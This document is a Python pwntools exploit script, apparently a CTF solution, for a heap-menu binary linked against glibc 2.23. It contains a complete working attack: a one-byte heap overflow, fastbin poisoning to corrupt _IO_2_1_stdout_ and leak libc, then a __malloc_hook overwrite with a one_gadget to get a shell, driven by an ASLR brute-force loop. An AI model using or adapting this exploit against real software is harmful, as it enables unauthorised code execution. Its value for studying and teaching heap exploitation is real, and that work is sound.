from
pwn
import
*
from
LibcSearcher
import
*
# Short-hand wrappers around the module-global tube ``io`` (rebound by
# exp() for every attempt).  Each one returns whatever the underlying
# pwntools call returns, so they can be used exactly like the lambdas
# they replace.

def s(buf):
    """Send *buf* as-is (no newline)."""
    return io.send(buf)


def sl(buf):
    """Send *buf* followed by a newline."""
    return io.sendline(buf)


def sa(delim, buf):
    """Wait for *delim* on the tube, then send *buf* raw."""
    return io.sendafter(delim, buf)


def sal(delim, buf):
    """Wait for *delim* on the tube, then send *buf* plus newline."""
    return io.sendlineafter(delim, buf)


def shell():
    """Hand the tube over to the user (interactive mode)."""
    return io.interactive()


def r(n=None):
    """Receive up to *n* bytes (pwntools default when None)."""
    return io.recv(n)


def ra(t=tube.forever):
    """Receive until EOF, waiting at most *t* (default: forever)."""
    return io.recvall(t)


def ru(delim):
    """Receive through the first occurrence of *delim*."""
    return io.recvuntil(delim)


def rl():
    """Receive a single line."""
    return io.recvline()


def rls(n=2 ** 20):
    """Receive *n* lines (default 2**20)."""
    return io.recvlines(n)
# Fixed target artefacts.  The libc is a glibc 2.23 build at the classic
# 16.04-style path; every hard-coded offset further down (the fastbin
# targets near _IO_2_1_stdout_ / __malloc_hook and the one_gadget) is
# tied to that exact file.  LibcSearcher is imported above but unused.
libc_path = "/lib/x86_64-linux-gnu/libc-2.23.so"
elf_path = "./pwn"

# pwntools ELF handles; ``libc.sym`` is what exp() uses for symbol offsets.
libc, elf = ELF(libc_path), ELF(elf_path)
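# pwntools context from argv[1]: '1' -> debug logging, '0' -> info.
# Both branches of the original passed the same terminal/arch/os and
# differed only in log_level, so they are folded into one lookup table.
# A missing argument used to abort the script with IndexError before
# anything ran; it now falls back to '0' (info).  Any other value leaves
# the context untouched, exactly as before -- p64()/u64() are explicit
# 64-bit packers, so the exploit itself does not depend on context.arch.
_LOG_LEVELS = {'1': 'debug', '0': 'info'}
_mode = sys.argv[1] if len(sys.argv) > 1 else '0'
if _mode in _LOG_LEVELS:
    context(log_level=_LOG_LEVELS[_mode], terminal='/bin/zsh', arch='amd64', os='linux')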
# Prompt fragments printed by the target's menu; the helpers below wait
# for them with sendlineafter/sendafter before answering.
#   cho -> main menu prompt, ind -> slot index, siz -> length,
#   con -> chunk content.  ``edi`` is an empty placeholder that this
#   script never uses.
cho, siz, con, ind, edi = '>>>', 'len:', 'content:', 'idx:', ''
def add(index, size, content='\n', c='1'):
    """Drive menu option *c* (default '1' = add) for slot *index*.

    Index and size are answered as decimal strings with a newline;
    *content* is sent raw via sendafter (no newline appended), so the
    caller controls the exact number of bytes the target reads.
    """
    answers = ((cho, c), (ind, str(index)), (siz, str(size)))
    for prompt, value in answers:
        sal(prompt, value)
    sa(con, content)
def free(index, c='2'):
    """Drive menu option *c* (default '2' = free) for slot *index*."""
    for prompt, value in ((cho, c), (ind, str(index))):
        sal(prompt, value)
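def get_proc_base(p):
    """Log and return the load base of the target executable in process *p*.

    ``p.libs()`` is keyed by resolved absolute paths, so the executable is
    located as realpath(cwd + argv[0]).  The original built the key from
    the private ``p._cwd`` plus ``argv[0].strip('.')``, which strips every
    leading/trailing dot and therefore mis-resolves anything that is not
    exactly ``./name`` (``../pwn`` became ``/pwn``); it also only logged
    the value instead of returning it.

    Args:
        p: a pwntools ``process``.

    Returns:
        int: base address of the executable's mapping.

    Raises:
        KeyError: if the resolved path is not among ``p.libs()``.
    """
    import os
    argv0 = p.argv[0]
    if isinstance(argv0, bytes):      # newer pwntools may hand argv back as bytes
        argv0 = argv0.decode()
    exe = os.path.realpath(os.path.join(p.cwd, argv0))
    proc_base = p.libs()[exe]
    info(hex(proc_base))
    return proc_base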
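def get_libc_base(p):
    """Log and return the load base of the configured libc in process *p*.

    ``p.libs()`` is keyed by resolved absolute paths, so ``libc_path`` is
    realpath'd first; for the real ``libc-2.23.so`` file this is the same
    key the original used, but a symlinked path (``libc.so.6``) would
    otherwise miss.  The original only logged the value; it is now also
    returned so callers can use it.

    Args:
        p: a pwntools ``process``.

    Returns:
        int: base address of the libc mapping.

    Raises:
        KeyError: if *libc_path* is not mapped in *p*.
    """
    import os
    libc_base = p.libs()[os.path.realpath(libc_path)]
    info(hex(libc_base))
    return libc_base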
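def exp():
    """Run one attempt of the heap exploit against a fresh ``./pwn``.

    Rebinds the module-global ``io`` to a new process.  Round one leaks a
    libc pointer by redirecting a fastbin into ``_IO_2_1_stdout_`` and
    rewriting its flags/write pointers; round two repeats the same
    consolidation trick to put a one_gadget into ``__malloc_hook`` and
    triggers it with a final add().  Every payload is one byte longer
    than the requested length, i.e. the target evidently allows a single
    byte overflow into the next chunk's size field.

    Round one's fastbin target is a 2-byte partial overwrite of a libc
    pointer, so 4 ASLR bits are guessed; a wrong guess usually kills the
    target (EOFError) or yields an unaligned leak (ValueError) and the
    caller retries.

    Raises:
        ValueError: if the leaked libc base is not page-aligned.
        Any pwntools tube exception when the target dies mid-way.
    """
    global io
    io = process(elf_path)

    # --- round 1: leak libc via _IO_2_1_stdout_ -------------------------
    # Chunk sizes: 0xc0 | 0x70 (fastbin) | 0x100 | 0x30 (guard against top).
    add(0, 0xb8, 'a' * 0xb0)
    add(1, 0x68, 'b' * 0x68)
    add(2, 0xf8, 'c' * 0xc8)
    add(3, 0x28, 'd' * 0x28)
    free(0)      # 0xc0 chunk -> unsorted bin
    free(1)      # 0x70 chunk -> fastbin
    # Reclaim chunk 1 and write prev_size = 0x130 (= 0xc0 + 0x70) followed
    # by a NUL into chunk 2's size byte (clears PREV_INUSE).
    add(1, 0x68, '\x00' * 0x60 + p64(0x130) + '\x00')
    free(2)      # backward consolidation over chunks 0 and 1
    free(1)      # chunk 1, now inside the merged chunk, -> fastbin again
    # Carve chunk 0 back out; the trailing 0x71 lands on chunk 1's size
    # byte, keeping it a 0x70-fastbin-compatible value.
    add(0, 0xb8, 'a' * 0xb8 + '\x71')
    # Chunk 1 is served from the unsorted remainder while still sitting in
    # the fastbin; the two-byte write relies on its fd holding a main_arena
    # pointer at this point and redirects it to _IO_2_1_stdout_ - 0x43
    # (a fake 0x7f-sized chunk).  Bits 12-15 (0x2xxx vs 0x?xxx) are the
    # ASLR guess, hence the retry loop in the caller.
    add(1, 0x70, '\xdd\x25')
    free(0)
    add(0, 0xb8, 'a' * 0xb8 + '\x71')   # re-apply the 0x71 size byte after the 0x80 split
    add(4, 0x68, '\xdd')                # pops chunk 1; fastbin head = the fake chunk
    # Pop the fake chunk inside stdout: fake data starts at stdout - 0x33,
    # so 0x33 bytes of padding reach the FILE struct.  Then flags =
    # 0xfbad1800, _IO_read_ptr/end/base = 0 and the low byte of
    # _IO_write_base = 0x20, so the next output flushes the FILE struct
    # itself, beginning at its own address.
    add(5, 0x68, 'a' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + '\x20')
    # The first 0x7f byte in the dump belongs to the _IO_write_base
    # pointer, which now equals &_IO_2_1_stdout_.  The original subtracted
    # the no-ASLR gdb difference 0x7ffff7dd2620 - 0x7ffff7a0d000 = 0x3c5620,
    # which is exactly this libc's _IO_2_1_stdout_ offset; taking it from
    # the symbol table keeps the leak tied to the libc actually loaded.
    libc_base = u64(ru('\x7f')[-6:].ljust(8, '\x00')) - libc.sym['_IO_2_1_stdout_']
    if libc_base & 0xfff:
        # Wrong ASLR guess or garbage in the dump: fail fast so the caller retries.
        raise ValueError("libc base not page-aligned: " + hex(libc_base))
    info("libc base:" + hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    info("mallochook:" + hex(malloc_hook))

    # --- round 2: __malloc_hook -> one_gadget ---------------------------
    # Allocate slot 2 again (0xf0 chunk), presumably to absorb the remainder
    # left by round one so the heap is clean before repeating the trick.
    # The original sends the menu choice with sl() rather than sal(cho, ..)
    # here -- the leaked FILE bytes precede the next prompt -- kept as-is.
    sl('1')
    sal('idx:', str(2))
    sal('len:', str(0xe8))
    sa('content', 'ppp')
    add(6, 0xb8, 'a' * 0xb0)
    add(7, 0x68, 'b' * 0x68)
    add(8, 0xf8, 'c' * 0xc8)
    add(9, 0x28, 'd' * 0x28)
    free(6)
    free(7)
    add(7, 0x68, '\x00' * 0x60 + p64(0x130) + '\x00')   # prev_size + NUL byte again
    free(7)
    free(8)      # consolidates backwards over chunks 6 and 7
    add(6, 0xb8, 'a' * 0xb8 + '\x71')
    # libc base is known now, so the fastbin fd gets a full pointer:
    # __malloc_hook - 0x23 is the usual fake 0x7f chunk in front of the hook.
    add(7, 0x70, p64(malloc_hook - 0x23))
    free(6)
    add(6, 0xb8, 'a' * 0xb8 + '\x71')
    add(10, 0x68, '\xed')       # pops chunk 7; fastbin head = fake chunk at hook - 0x23
    # one_gadget offset; 0xf1207 belongs to one specific 2.23 build --
    # TODO(review): confirm with `one_gadget` against the file at libc_path.
    ogg = libc_base + 0xf1207
    # Fake chunk data starts at __malloc_hook - 0x13: 0x13 bytes of padding,
    # then the hook itself.
    add(11, 0x68, '\x00' * 0x13 + p64(ogg))
    # Any further malloc() now runs through the hook: request slot 0 with
    # len 100 and stop before the content prompt (the hook fires first).
    sal('>>>', '1')
    sal("idx:", '0')
    sal('len:', '100')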
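# Brute-force driver.  exp() guesses 4 ASLR bits with its 2-byte partial
# overwrite, so roughly one attempt in 16 succeeds; a miss usually kills
# the target (EOFError from the tube) or yields a misaligned leak
# (ValueError).  Both are caught here and a fresh process is started.
io = None          # rebound by exp(); stays None until the first process() call
while True:
    try:
        exp()
        io.interactive()
        break
    except Exception:
        info("try again")
        # The original called io.close() unconditionally, which turned a
        # failure before process() on the first attempt into a NameError.
        if io is not None:
            io.close()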